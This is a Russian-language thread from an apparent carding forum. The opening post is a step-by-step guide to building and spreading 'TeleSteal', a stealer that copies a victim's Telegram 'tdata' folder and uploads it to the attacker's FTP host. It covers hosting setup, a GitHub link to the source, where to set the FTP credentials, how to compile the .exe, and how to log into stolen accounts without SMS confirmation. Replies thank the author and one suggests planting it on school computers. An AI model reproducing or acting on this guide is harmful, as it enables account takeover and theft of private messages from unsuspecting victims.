Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Взламываем телеграм при помощи TeleSteal

applepiegangsta

Опытный user
Регистрация
1 Май 2022
Сообщения
166
Реакции
1
Всем привет , мб эту тему уже все знают но все же , считаю своим долгом с вами этим поделится.

Для начала снова быстренько пробежимся по общей информации. Суть стиллера заключается в том, что при запуске жертвой .exe файла, программа проверяет наличие на пк Telegram и, если находит его, то копирует папку "tdata" и отправляет хозяину программы на сервер.


Для тех кто не знает, что это за папка и почему нам нужна именно она: при первом запуске Telegram на ПК у вас создается папка tdata, в которой хранится вся информация аккаунта, если злоумышленники украдут данную папку, то они смогут войти в аккаунт без смс подтверждения, ниже распишу об этом подробнее
Суть

Переходим по Ссылочке и скачиваем Visual Studio 2019.

Жмем "Скачать". После того как мы скачали студию, мы должны нажать на галочку


НАСТРОЙКА ХОСТИНГА

Итак, тут нам уже любой хостинг подходит, главное - FTP подключение. Я зарегался в VDSina, также могу порекомендовать TimeWeb (да-да он, не реклама так-то). Регаемся, создаем сайт, и получаем в панели управления данные для подключения к FTP.

Сохраняем наши данные, и переходим к коду.

Настройка и билд кода
Ссылка на код:

https://github.com/dogberttg/TeleSteal

Скачиваем, распаковываем архив, и открываем TeleSteal.sln через Visual Studio.



Выбираем Program.cs, листаем в самый низ кода, и мы должны увидеть этот блок. В эти три переменные мы вставляем данные от нашего FTP хоста.
В моем случае, это:


Код:
host = "files.000wehhost.com"
login = "DOLFX"
pass = "тут мой пароль"


Все! Нам осталось выбрать сверху вместо Debug > Release, и нажать Ctrl + B, чтобы создать билд нашего кода.


После этого у вас сгенерируется файл TeleSteal.exe, он по умолчанию будет лежать в папке TeleSteal, которую мы скачали с гитхаба. Этот файл и является нашим вредоносом, название его можно менять. После того, как жертва запустит скрипт TeleSteal.exe ничего не произойдет, но это только на первый взгляд.
Чтобы получить ворованные данные - нам нужно зайти в файловый менеджер вашего хостинга (вам придёт столько папко tdata, сколько раз жертва запустит ваш файл)

У нас появился архив с папкой tdata, это папка с ПК жертвы, которая открыла ваш стиллер.

Скачиваем её на свой пк, распаковываем из архива все эти файлы, создаём папку с названием "tdata" и отправляем все эти файлы в папку.
Теперь мы можем войти в аккаунт жертвы, для этого мы скачиваем официальное приложение Telegram для ПК, не запускаем его, создаем новую папку, засовываем туда tdata с файлами жертвы и приложение Telegram.

Подсказка: если архив с тдатой весит меньше 6мб, то скорее-всего это пустой лог (то есть телеграм на пк жертвы есть, но он не авторизован).

Запускаем приложение Telegram, готово, мы в аккаунте жертвы!
 

GenaReshala

Опытный user
Регистрация
1 Окт 2021
Сообщения
790
Реакции
18
Попробую на днях, спасибо за гайд.
 

MrAndrey

Интересующийся
Регистрация
20 Ноя 2022
Сообщения
71
Реакции
11
отличный гайд,спасибо
 

Wintert

Опытный user
Регистрация
4 Авг 2022
Сообщения
103
Реакции
4
как раз,то что я искал,спасибо
 

distordedFunnyKid

Опытный user
Регистрация
22 Мар 2021
Сообщения
159
Реакции
3
Точно пригодится, хотя вот я использую telegram web, ниче не смогут же сделать
 

Cityboss

Участник клуба
Регистрация
13 Апр 2022
Сообщения
286
Реакции
7
проверю,если сработает,заебок будет
 

77literatureflowers

Опытный user
Регистрация
29 Май 2022
Сообщения
172
Реакции
8
distordedFunnyKid написал(а):
Точно пригодится, хотя вот я использую telegram web, ниче не смогут же сделать
Если куки браузера спиздят, то и твой тг тоже
 

Andrew220Dagestan

Опытный user
Регистрация
7 Окт 2021
Сообщения
166
Реакции
3
Можно закинуть на школьные компьютеры и ждать =)
 

mentxlsmokeless

Опытный user
Регистрация
19 Июл 2021
Сообщения
201
Реакции
5
Andrew220Dagestan написал(а):
Можно закинуть на школьные компьютеры и ждать =)
Смотря че за школа, у нас даже компьютеров не было, телеграма тем более
 
Сверху Снизу